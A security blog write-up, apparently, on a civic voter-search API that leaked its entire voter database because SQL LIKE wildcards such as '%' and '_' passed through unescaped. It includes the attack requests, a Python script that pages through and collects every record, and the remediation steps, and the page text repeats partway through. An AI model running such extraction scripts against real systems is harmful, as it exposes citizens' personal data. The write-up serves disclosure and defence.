Othersql-injectionwildcard-abusedata-exposurevoter-datainput-validation

Searching for Every Voter With a Single Percent Sign

high

March 30, 2026

7 min read

Severityhigh

CVSS0.0

AttackOther

Searching for Every Voter With a Single Percent Sign

The platform was straightforward. A civic technology application that allowed authorized users — election officials, campaign volunteers, poll workers — to look up registered voters by name. Type a name, get a match. Standard search functionality that exists on thousands of government platforms.

The search field had a magnifying glass icon and a placeholder that read "Search by last name." Nothing about it suggested it would become the most interesting part of the assessment.

The Search That Returned Too Much

During the initial reconnaissance phase, I used the search function as intended. Typed a common last name, got a paginated list of results. The API behind it was clean — a single endpoint that accepted a query parameter and returned matching records:

GET /api/v1/voters/search?q=Smith

The response came back with a JSON array of voter records:

json

{
  "results": [
    {
      "id": "VR-2847291",
      "firstName": "James",
      "lastName": "Smith",
      "dateOfBirth": "1985-03-14",
      "address": "1247 Oak Street, Apt 3B",
      "city": "Springfield",
      "state": "IL",
      "zip": "62704",
      "registrationDate": "2012-09-22",
      "status": "Active",
      "partyAffiliation": "Independent"
    }
  ],
  "total": 1847,
  "page": 1,
  "pageSize": 25
}

Full names, home addresses, dates of birth, party affiliations. This was expected — it was the purpose of the application. The question was whether the search enforced any boundaries on what an authorized user could extract.

I started with the obvious tests. Empty string, single letter, special characters. Then I tried the percent sign:

GET /api/v1/voters/search?q=%25

The %25 is the URL-encoded form of %. The server decoded it, dropped it into a query, and the response came back:

json

{
  "results": [
    { "id": "VR-0000001", "firstName": "Aaron", "lastName": "Aaberg", ... },
    { "id": "VR-0000002", "firstName": "Maria", "lastName": "Aaland", ... },
    { "id": "VR-0000003", "firstName": "Robert", "lastName": "Aames", ... }
  ],
  "total": 3847291,
  "page": 1,
  "pageSize": 25
}

3,847,291 results. Every registered voter in the system. Sorted alphabetically, paginated in chunks of 25 — and the pagination worked. Page 2, page 3, page 153,891. Every page returned the next 25 records, all the way to the end of the database.

Why It Worked

The backend was wrapping user input in a SQL LIKE clause for partial matching:

sql

SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'

When the input itself is %, the query becomes LIKE '%%%' — three wildcards that match every row in the table. The query was parameterized, so traditional SQL injection was blocked. But the LIKE clause worked exactly as designed. The application never sanitized wildcard metacharacters, so the percent sign was not an injection — it was a valid pattern that happened to mean "return everything."

The Scope of Exposure

The pagination endpoint had no upper bound. There was no maximum page number, no query timeout, and no limit on how many pages a single session could request. A simple script could iterate through every page and collect the full dataset:

python

import requests
 
session = requests.Session()
session.headers.update({"Authorization": "Bearer <valid_token>"})
 
page = 1
all_records = []
 
while True:
    response = session.get(
        "https://platform.example/api/v1/voters/search",
        params={"q": "%", "page": page, "pageSize": 100}
    )
    data = response.json()
    all_records.extend(data["results"])
 
    if page * 100 >= data["total"]:
        break
    page += 1
 
print(f"Collected {len(all_records)} records")

I modified the pageSize parameter as well. The default was 25, but the API accepted arbitrary values:

GET /api/v1/voters/search?q=%25&page=1&pageSize=10000

It returned 10,000 records in a single response. No server-side maximum. The only constraint was how large a JSON response the client was willing to parse.

With a pageSize of 10,000, the entire database could be extracted in under 400 requests. At the rate the server responded, that was roughly fifteen minutes of scripted pagination.

The Underscore Variant

The percent sign was not the only wildcard that worked. The underscore character (_) matches exactly one character in SQL LIKE syntax. This enabled more targeted extraction:

GET /api/v1/voters/search?q=___

Three underscores. This matched every last name that was exactly three characters long. While less dramatic than dumping the entire database, it demonstrated that wildcard syntax was being interpreted directly, and it could be used for precision queries:

GET /api/v1/voters/search?q=S____

Every five-letter last name starting with S. Combined with other data points, this could narrow searches to specific individuals without knowing their exact name — a capability the application was not designed to provide.

What Made This Dangerous

The data exposed per record was substantial: full legal name, date of birth, home address, party affiliation, registration status, and registration date. This is the combination of fields that identity verification systems use. It is also the combination that enables targeted social engineering, voter intimidation, and identity fraud.

The volume amplified the impact. This was not a single record disclosed through an IDOR. It was the entire population of registered voters in the jurisdiction, extractable in bulk, by any user with a valid session token. Campaign volunteers, temporary poll workers, anyone with legitimate but limited-purpose access could execute this extraction.

The application had audit logging, but the logs recorded the HTTP request, not the semantic intent. A request to /api/v1/voters/search?q=%25 looked identical in structure to a request to /api/v1/voters/search?q=Johnson. Nothing in the logging infrastructure distinguished a legitimate name search from a full database extraction.

The Fix

The remediation required changes at multiple levels.

Escape wildcard characters in user input. Before passing user input into a LIKE clause, escape the % and _ characters so they are treated as literal characters, not wildcards:

sql

-- Before: wildcards pass through
SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'
 
-- After: wildcards escaped
SELECT * FROM voters
WHERE last_name LIKE '%' || replace(replace($1, '%', '\%'), '_', '\_') || '%'
ESCAPE '\'

Enforce minimum input length. Reject searches shorter than two or three characters. A single-character search has no legitimate use case and should return an error, not results.

Cap result counts. Enforce a maximum total result count server-side. If a query matches more than a reasonable threshold — say 500 records — return an error asking the user to refine their search. Do not return the first 500 and tell them there are 3.8 million more.

Lock down page size. The server should enforce a maximum pageSize regardless of what the client requests. Accept 25, 50, or 100. Reject 10,000.

Add semantic audit logging. Log not just the request parameters but the result count. A search that returns 3.8 million matches should trigger an alert, regardless of what character was searched.

The Deeper Lesson

This vulnerability did not require breaking anything. The SQL query was parameterized. The authentication was valid. The authorization model was correct — the user was permitted to search for voters. Every component worked exactly as designed.

The problem was a missing assumption. The developers assumed the search field would contain names. They did not account for the fact that SQL LIKE syntax has metacharacters, and that those metacharacters would be interpreted by the database engine even when delivered through parameterized queries.

Parameterized queries prevent SQL injection. They do not prevent SQL from doing what you told it to do. If you tell the database to match every row, it will match every row. The application has to decide what queries are acceptable, not just what queries are syntactically safe.

A search field that accepts % is a search field that accepts "return everything." That is not an injection. It is a feature — one that nobody intended to ship.

Newsletter

Get the next vulnerability writeup in your inbox

Subscribe for new case studies, exploit chains, and practical remediation guidance from Raijuna.

No spam. Unsubscribe anytime.

Mar 22, 2026

Half a Billion Profiles Behind a User-Agent String

A major platform's API returned full user profiles to anyone who asked. The only barrier was a WAF that ignored mobile traffic. One header change, hundreds of millions of accounts exposed.

Apr 19, 2026

Enumerating Internal Architecture Through a Container Registry

During a black-box assessment of a global infrastructure provider, an unauthenticated Harbor container registry exposed the organization's complete internal project structure — service names, repository counts, team namespaces, and architectural relationships — without requiring any credentials. This is how the registry was found, what it disclosed, and why container registries with open access represent a more serious reconnaissance surface than they appear.

Apr 15, 2026

Publishing Your Complete API Surface by Accident

During a black-box assessment of a global infrastructure provider, publicly accessible OpenAPI specification files revealed the complete internal API surface of multiple services — including endpoints, authentication schemes, request parameters, and response schemas for operations that had no business being documented for public consumption. This is how they were found, what they disclosed, and why specification files sitting on the open internet represent a more serious risk than most organizations acknowledge.

Summary

A search field on a civic technology platform accepted SQL LIKE wildcards without sanitization. Entering a single percent sign returned the entire database — every record, every row, no authentication escalation required. Just one character in a search box.

Key Takeaways

1SQL LIKE wildcards passed directly through search inputs can dump entire database tables without traditional SQL injection
2A single percent sign (%) matches every row when used as a LIKE pattern, turning a search field into a full data export
3Civic and government platforms handling sensitive citizen data are particularly high-impact targets for this class of vulnerability
4Server-side result limits, input sanitization, and parameterized patterns are necessary to prevent wildcard abuse
5This vulnerability often hides in plain sight because the application appears to function normally — it just returns too much data

Frequently Asked Questions

What is SQL LIKE wildcard abuse?

SQL LIKE wildcard abuse occurs when user input is passed directly into a SQL LIKE clause without sanitizing wildcard characters. The percent sign (%) matches any sequence of characters, and the underscore (_) matches any single character. If a search field passes user input directly into a query like WHERE name LIKE '%user_input%', an attacker can enter just '%' to match every row in the table, effectively dumping the entire dataset through a legitimate search function.

Is wildcard abuse the same as SQL injection?

Not exactly. Traditional SQL injection breaks out of the intended query structure by injecting SQL syntax like quotes and semicolons. Wildcard abuse stays within the intended query structure — the LIKE clause works exactly as designed. The vulnerability is that the application does not restrict which patterns a user can submit. The query is technically valid; it just returns far more data than intended. This makes wildcard abuse harder to detect with traditional SQL injection filters.

How do you prevent SQL LIKE wildcard abuse?

Escape wildcard characters (% and _) in user input before passing them to LIKE clauses. Enforce server-side result limits so no query can return more than a reasonable number of rows. Implement minimum input length requirements — a single-character search should be rejected. Consider using full-text search indexes instead of LIKE for search functionality, as they provide better performance and do not expose wildcard syntax to users.

Why is voter data exposure particularly serious?

Voter registration data typically includes full legal names, home addresses, dates of birth, and party affiliations. This combination of personally identifiable information enables identity theft, targeted harassment, voter intimidation, and social engineering attacks. Unlike a password breach where credentials can be rotated, personal details like home addresses and birth dates cannot be changed. The exposure of an entire voter database affects every registered citizen in the jurisdiction.

Othersql-injectionwildcard-abusedata-exposurevoter-datainput-validation

Searching for Every Voter With a Single Percent Sign

high

March 30, 2026

7 min read

Severityhigh

CVSS0.0

AttackOther

Searching for Every Voter With a Single Percent Sign

The search field had a magnifying glass icon and a placeholder that read "Search by last name." Nothing about it suggested it would become the most interesting part of the assessment.

The Search That Returned Too Much

GET /api/v1/voters/search?q=Smith

The response came back with a JSON array of voter records:

json

{
  "results": [
    {
      "id": "VR-2847291",
      "firstName": "James",
      "lastName": "Smith",
      "dateOfBirth": "1985-03-14",
      "address": "1247 Oak Street, Apt 3B",
      "city": "Springfield",
      "state": "IL",
      "zip": "62704",
      "registrationDate": "2012-09-22",
      "status": "Active",
      "partyAffiliation": "Independent"
    }
  ],
  "total": 1847,
  "page": 1,
  "pageSize": 25
}

I started with the obvious tests. Empty string, single letter, special characters. Then I tried the percent sign:

GET /api/v1/voters/search?q=%25

The %25 is the URL-encoded form of %. The server decoded it, dropped it into a query, and the response came back:

json

{
  "results": [
    { "id": "VR-0000001", "firstName": "Aaron", "lastName": "Aaberg", ... },
    { "id": "VR-0000002", "firstName": "Maria", "lastName": "Aaland", ... },
    { "id": "VR-0000003", "firstName": "Robert", "lastName": "Aames", ... }
  ],
  "total": 3847291,
  "page": 1,
  "pageSize": 25
}

Why It Worked

The backend was wrapping user input in a SQL LIKE clause for partial matching:

sql

SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'

The Scope of Exposure

python

import requests
 
session = requests.Session()
session.headers.update({"Authorization": "Bearer <valid_token>"})
 
page = 1
all_records = []
 
while True:
    response = session.get(
        "https://platform.example/api/v1/voters/search",
        params={"q": "%", "page": page, "pageSize": 100}
    )
    data = response.json()
    all_records.extend(data["results"])
 
    if page * 100 >= data["total"]:
        break
    page += 1
 
print(f"Collected {len(all_records)} records")

I modified the pageSize parameter as well. The default was 25, but the API accepted arbitrary values:

GET /api/v1/voters/search?q=%25&page=1&pageSize=10000

It returned 10,000 records in a single response. No server-side maximum. The only constraint was how large a JSON response the client was willing to parse.

With a pageSize of 10,000, the entire database could be extracted in under 400 requests. At the rate the server responded, that was roughly fifteen minutes of scripted pagination.

The Underscore Variant

The percent sign was not the only wildcard that worked. The underscore character (_) matches exactly one character in SQL LIKE syntax. This enabled more targeted extraction:

GET /api/v1/voters/search?q=___

GET /api/v1/voters/search?q=S____

What Made This Dangerous

The Fix

The remediation required changes at multiple levels.

Escape wildcard characters in user input. Before passing user input into a LIKE clause, escape the % and _ characters so they are treated as literal characters, not wildcards:

sql

-- Before: wildcards pass through
SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'
 
-- After: wildcards escaped
SELECT * FROM voters
WHERE last_name LIKE '%' || replace(replace($1, '%', '\%'), '_', '\_') || '%'
ESCAPE '\'

Enforce minimum input length. Reject searches shorter than two or three characters. A single-character search has no legitimate use case and should return an error, not results.

Lock down page size. The server should enforce a maximum pageSize regardless of what the client requests. Accept 25, 50, or 100. Reject 10,000.

Add semantic audit logging. Log not just the request parameters but the result count. A search that returns 3.8 million matches should trigger an alert, regardless of what character was searched.

The Deeper Lesson

A search field that accepts % is a search field that accepts "return everything." That is not an injection. It is a feature — one that nobody intended to ship.

Newsletter

Get the next vulnerability writeup in your inbox

Subscribe for new case studies, exploit chains, and practical remediation guidance from Raijuna.

No spam. Unsubscribe anytime.

Mar 22, 2026

Half a Billion Profiles Behind a User-Agent String

A major platform's API returned full user profiles to anyone who asked. The only barrier was a WAF that ignored mobile traffic. One header change, hundreds of millions of accounts exposed.

Apr 19, 2026

Enumerating Internal Architecture Through a Container Registry

Apr 15, 2026

Publishing Your Complete API Surface by Accident

Summary

Key Takeaways

1SQL LIKE wildcards passed directly through search inputs can dump entire database tables without traditional SQL injection
2A single percent sign (%) matches every row when used as a LIKE pattern, turning a search field into a full data export
3Civic and government platforms handling sensitive citizen data are particularly high-impact targets for this class of vulnerability
4Server-side result limits, input sanitization, and parameterized patterns are necessary to prevent wildcard abuse
5This vulnerability often hides in plain sight because the application appears to function normally — it just returns too much data

Frequently Asked Questions

What is SQL LIKE wildcard abuse?

Is wildcard abuse the same as SQL injection?

How do you prevent SQL LIKE wildcard abuse?

Why is voter data exposure particularly serious?

Searching for Every Voter With a Single Percent Sign

The Search That Returned Too Much

Why It Worked

The Scope of Exposure

The Underscore Variant

What Made This Dangerous

The Fix

The Deeper Lesson

Get the next vulnerability writeup in your inbox

Related Posts

Summary

Key Takeaways

Frequently Asked Questions

Searching for Every Voter With a Single Percent Sign

The Search That Returned Too Much

Why It Worked

The Scope of Exposure

The Underscore Variant

What Made This Dangerous

The Fix

The Deeper Lesson

Get the next vulnerability writeup in your inbox

Related Posts

Summary

Key Takeaways

Frequently Asked Questions